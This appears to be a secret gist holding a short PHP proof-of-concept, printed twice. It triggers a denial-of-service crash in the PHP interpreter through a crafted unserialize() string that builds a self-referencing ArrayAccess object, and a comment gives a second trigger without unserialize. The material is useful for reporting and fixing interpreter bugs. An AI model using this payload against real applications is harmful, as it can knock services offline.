dsadyrin/offsetGet_dos.php Secret

## offsetGet_dos.php
<?php

class Obj implements ArrayAccess {

  	public function offsetExists($key) {
        return true;
    }

	public function offsetSet($key, $value) { }

	public function offsetGet($key) {
		$this->data[123];					//any offset, need an object property
		return 1;
	}

	public function offsetUnset($key) {
		return;
	}
}

class A {
	function __destruct() {
		$this->config['username'] ;
	}
}

unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');

/*
If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.

$o1 = new Obj;
$o1->data = &$o1;

$o2 = new A();
$o2->config = $o1;
*/

?>
	<?php

	class Obj implements ArrayAccess {

	public function offsetExists($key) {
	return true;
	}

	public function offsetSet($key, $value) { }

	public function offsetGet($key) {
	$this->data[123]; //any offset, need an object property
	return 1;
	}

	public function offsetUnset($key) {
	return;
	}
	}

	class A {
	function __destruct() {
	$this->config['username'] ;
	}
	}

	unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');

	/*
	If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.

	$o1 = new Obj;
	$o1->data = &$o1;

	$o2 = new A();
	$o2->config = $o1;
	*/

	?>